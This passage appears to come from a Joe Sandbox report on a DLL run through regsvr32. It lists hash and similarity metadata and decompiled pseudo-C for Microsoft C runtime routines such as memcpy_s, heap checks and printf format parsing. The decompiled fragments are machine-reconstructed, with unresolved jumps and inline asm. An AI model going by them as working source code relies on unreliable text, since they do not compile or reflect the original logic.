                                                                                • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                • Instruction Fuzzy Hash: C271306291C6C685E7B09B20E8543BE77F4EB86344F488135D6AC86A9EDFBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                                                • API String ID: 2123368286-3692278645
                                                                                • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                • Instruction ID: be8253c8859652bc721a5698aabbdf542aa389e51f2d71ca027574c554a6ae67
                                                                                • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                • Instruction Fuzzy Hash: 43514A3291C68696F7608B10E84437A76F0FB96344F588035E69E57A9CCFFDE545CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _free_base_malloc_base
                                                                                • String ID:
                                                                                • API String ID: 3824334587-0
                                                                                • Opcode ID: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                • Instruction ID: 7a990f7b77e6bdd006dd2554f04aea65db73dba116dac9f2704552dd3f026af3
                                                                                • Opcode Fuzzy Hash: f253414e3849525c296ec210365ea501a1b810d2bb56cf35f247e52024ae0b7b
                                                                                • Instruction Fuzzy Hash: 2A310E3191CA8286E6609B60EC4433EB7F1FB86754F188535E69D5669DCFFCF5818B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$state != NULL
                                                                                • API String ID: 2123368286-817335350
                                                                                • Opcode ID: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                • Instruction ID: 6e8ab8c3b6f718918b00cfe3586a1e8135d4eb78a27ae822e9847d7c94ee11c7
                                                                                • Opcode Fuzzy Hash: 3b86e21d312907f031a9c3af8c0eef3d8af61768b64ebe8bc9406c081913c3b7
                                                                                • Instruction Fuzzy Hash: B561ED36A18B4596EB14CB19E89132A77F0FB86794F248135EB8D47BA8CF7DE451CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00007FFA7FFA5246CFF0(intOrPtr _a8) {
                                                                                				intOrPtr _v24;
                                                                                				long long _v48;
                                                                                				long long _v64;
                                                                                				intOrPtr _t21;
                                                                                
                                                                                				_a8 = _t21;
                                                                                				_v48 = 0;
                                                                                				_v64 = 0;
                                                                                				_v24 = _a8;
                                                                                				_v24 = _v24 - 2;
                                                                                				if (_v24 - 0x14 > 0) goto 0x5246d13e;
                                                                                				goto __rax;
                                                                                			}








                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Invalid signal or error", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c$raise
                                                                                • API String ID: 2123368286-2245755083
                                                                                • Opcode ID: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                • Instruction ID: b564615e5252428421880e4fe8b3f2563968ff19dd30a29cf8f0db3838165b5a
                                                                                • Opcode Fuzzy Hash: 18adc300c2b93f7eab7b819d563e90f5c41814788a4c43fa347d2340d41b98cd
                                                                                • Instruction Fuzzy Hash: BA71D932A1C692CAE7648B14E85436AB7F0FB86754F188135E68E47B98CFBCE444CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: HeapPointerValid
                                                                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$L7$LX
                                                                                • API String ID: 299318057-1988567080
                                                                                • Opcode ID: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                • Instruction ID: 06f64bca12a651b5fbb60543aafbc34b4c4a32f21945be4651f3edb8767a5a9d
                                                                                • Opcode Fuzzy Hash: 449abee572b00c001843884aa05b8e5cdaea28f8affc6eceb55751fcc4bbfe52
                                                                                • Instruction Fuzzy Hash: FA314471A1C78796EB64CB15EC4123967F5FB46780F588035E64D87BA8DFACE540CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer$_realloc_dbg
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\onexit.c$}
                                                                                • API String ID: 429494535-1858280179
                                                                                • Opcode ID: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                • Instruction ID: d48f703be94db6cc1ec72ff4ec3ac2447f88fe0eab01aed0393c9009d370df85
                                                                                • Opcode Fuzzy Hash: 950a78d59f72efd3ce43bd8456283c625fce50364ef15d6a0f5e845d51c15c3f
                                                                                • Instruction Fuzzy Hash: 2C41A432629B8596DA50CB45F88432AB7B4FB8A794F105035FB8E43B68DFBDD0948B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                                                                • String ID:
                                                                                • API String ID: 3799933513-0
                                                                                • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                • Instruction ID: 462b90ac148f7cb9c6bf058075bf1f4a435f3339ee30a2c8023ebc58c0aa2df1
                                                                                • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                                                                • Instruction Fuzzy Hash: 1951FE3292DA8295E7509B14FC4432A77F0FB86754F189135EA9D42BADDFBCE484CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 1967237116-734865713
                                                                                • Opcode ID: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                • Instruction ID: d14caa325b46be0c121400d7bd9b6cee561aaf56672b36750a7b9900c41c1f06
                                                                                • Opcode Fuzzy Hash: c2425827690f07a93f69eb38b450ff2678cd23c1eb01a19a01dfffa3a40938e6
                                                                                • Instruction Fuzzy Hash: 3CD1E87260CAC28AE7748B15E8403AAB7F0F785355F188135E6AD87A99DFBCE441CF04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00007FFA7FFA5247DF8D(signed short _a1208, signed int _a1412) {
                                                                                
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}




                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ("Incorrect format specifier", 0)$7$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 0-1585035072
                                                                                • Opcode ID: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                • Instruction ID: 4e5f8153b568388f662454edbb0a5cdd4974e072c175fa862a81821cc0efa5de
                                                                                • Opcode Fuzzy Hash: 0bf90205098d20be4f4e59ab582b3189e67a2fe65aecfe549d1a450604364a50
                                                                                • Instruction Fuzzy Hash: 97B1FB7660C6C28AE7748B55E8413ABB7E0FB85355F088135EA9D87A99DBBCE441CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (count == 0) || (string != NULL)$(format != NULL)$_vswprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c
                                                                                • API String ID: 2123368286-1876092940
                                                                                • Opcode ID: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                • Instruction ID: ceee81cd83b8744ad66a1e54cc0f79b6e85bf8d77b65c9d66d7ddbb01b5ae0c1
                                                                                • Opcode Fuzzy Hash: 9846629aa5f9262a1bee0fdfcec26bb25970a0f61289143976d8b215326cf8ff
                                                                                • Instruction Fuzzy Hash: BB911E32618B85CAE7608B15E84436A77F0F785794F188135EAAE87BA8DFBCD445DB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00007FFA7FFA5247BE32(signed int _a80, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096) {
                                                                                
                                                                                				_a972 = _a696 & 0x000000ff;
                                                                                				if (_a972 == 0x49) goto 0x5247beb7;
                                                                                				if (_a972 == 0x68) goto 0x5247bfc0;
                                                                                				if (_a972 == 0x6c) goto 0x5247be76;
                                                                                				if (_a972 == 0x77) goto 0x5247bfcd;
                                                                                				goto 0x5247bfd9;
                                                                                				if ( *_a1096 != 0x6c) goto 0x5247bea7;
                                                                                				_a1096 = _a1096 + 1;
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247beb2;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xf");
                                                                                				if ( *_a1096 != 0x36) goto 0x5247bf09;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 != 0x33) goto 0x5247bf4c;
                                                                                				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
                                                                                				_a1096 = _a1096 + 2;
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247bfbe;
                                                                                				if ( *_a1096 == 0x64) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x69) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x6f) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x75) goto 0x5247bfac;
                                                                                				if ( *_a1096 == 0x78) goto 0x5247bfac;
                                                                                				if ( *_a1096 != 0x58) goto 0x5247bfae;
                                                                                				goto 0x5247bfbe;
                                                                                				_a704 = 0;
                                                                                				goto E00007FFA7FFA5247BB66;
                                                                                				goto 0x5247bfd9;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247bfd9;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a976 = _a696;
                                                                                				_a976 = _a976 - 0x41;
                                                                                				if (_a976 - 0x37 > 0) goto 0x5247ca31;
                                                                                				goto __rax;
                                                                                			}




                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                • API String ID: 530996419-3826063230
                                                                                • Opcode ID: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                • Instruction ID: 842f0729a071b4da412b8b08186e26c23bfe4764b7c4e7dfbf96edeeec62775c
                                                                                • Opcode Fuzzy Hash: 6f4341bf75342723462239bb8ed84b432b5f9ccd09e3c394fa39f7378907594f
                                                                                • Instruction Fuzzy Hash: CE913C6290C6C68AE7718B54E88437EB7F4E786711F4C8036D6ADC7A5ECBACD5428F10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00007FFA7FFA5247DDE0(signed int _a80, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544) {
                                                                                
                                                                                				_a1408 = _a1208 & 0x0000ffff;
                                                                                				if (_a1408 == 0x49) goto 0x5247de66;
                                                                                				if (_a1408 == 0x68) goto 0x5247df6f;
                                                                                				if (_a1408 == 0x6c) goto 0x5247de24;
                                                                                				if (_a1408 == 0x77) goto 0x5247df7c;
                                                                                				goto 0x5247df88;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
                                                                                				_a1544 =  &(_a1544[1]);
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247de61;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xf");
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
                                                                                				goto 0x5247df6d;
                                                                                				_a1216 = 0;
                                                                                				goto E00007FFA7FFA5247DC41;
                                                                                				goto 0x5247df88;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}




                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$w
                                                                                • API String ID: 530996419-4206863317
                                                                                • Opcode ID: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                • Instruction ID: 337a1f15ba8e29ea0618cc9f9ce369f180cfb16ed9c5bab297954b839c68bf14
                                                                                • Opcode Fuzzy Hash: ea911f3e0001a33c00663cb6cc71ee2ff701874ce847a4c399e41a1539880d37
                                                                                • Instruction Fuzzy Hash: 04911D6291C6C1CAE7B08B15E84037AB3F1F786751F488136E6DD87A98DBBCD852DB10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA5247DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                				void* _t171;
                                                                                				char* _t191;
                                                                                				char* _t192;
                                                                                
                                                                                				_a1404 = _a1208 & 0x0000ffff;
                                                                                				if (_a1404 == 0x20) goto 0x5247dd05;
                                                                                				if (_a1404 == 0x23) goto 0x5247dd12;
                                                                                				if (_a1404 == 0x2b) goto 0x5247dcf8;
                                                                                				if (_a1404 == 0x2d) goto 0x5247dceb;
                                                                                				if (_a1404 == 0x30) goto 0x5247dd20;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000001;
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000002;
                                                                                				goto 0x5247dd2b;
                                                                                				asm("bts eax, 0x7");
                                                                                				goto 0x5247dd2b;
                                                                                				_a80 = _a80 | 0x00000008;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
                                                                                				_t191 =  &_a1560;
                                                                                				_a88 = E00007FFA7FFA52471E40(_t191);
                                                                                				if (_a88 >= 0) goto 0x5247dd6a;
                                                                                				_a80 = _a80 | 0x00000004;
                                                                                				_a88 =  ~_a88;
                                                                                				goto 0x5247dd83;
                                                                                				_a88 = _t171 + _t191 - 0x30;
                                                                                				_a116 = 0;
                                                                                				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
                                                                                				_t192 =  &_a1560;
                                                                                				_a116 = E00007FFA7FFA52471E40(_t192);
                                                                                				if (_a116 >= 0) goto 0x5247ddc2;
                                                                                				_a116 = 0xffffffff;
                                                                                				goto 0x5247dddb;
                                                                                				_a116 = _t171 + _t192 - 0x30;
                                                                                				_a1408 = _a1208 & 0x0000ffff;
                                                                                				if (_a1408 == 0x49) goto 0x5247de66;
                                                                                				if (_a1408 == 0x68) goto 0x5247df6f;
                                                                                				if (_a1408 == 0x6c) goto 0x5247de24;
                                                                                				if (_a1408 == 0x77) goto 0x5247df7c;
                                                                                				goto 0x5247df88;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
                                                                                				_a1544 =  &(_a1544[1]);
                                                                                				asm("bts eax, 0xc");
                                                                                				goto 0x5247de61;
                                                                                				_a80 = _a80 | 0x00000010;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xf");
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("bts eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
                                                                                				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
                                                                                				_a1544 =  &(_a1544[2]);
                                                                                				asm("btr eax, 0xf");
                                                                                				goto 0x5247df6d;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
                                                                                				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
                                                                                				goto 0x5247df6d;
                                                                                				_a1216 = 0;
                                                                                				goto E00007FFA7FFA5247DC41;
                                                                                				goto 0x5247df88;
                                                                                				_a80 = _a80 | 0x00000020;
                                                                                				goto 0x5247df88;
                                                                                				asm("bts eax, 0xb");
                                                                                				_a1412 = _a1208 & 0x0000ffff;
                                                                                				_a1412 = _a1412 - 0x41;
                                                                                				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
                                                                                				goto __rax;
                                                                                			}







                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 530996419-1247675978
                                                                                • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                • Instruction ID: 16ebebea6bc2600c4205c0812e354e977e52e2eb757765e37557dd7c0f15bf45
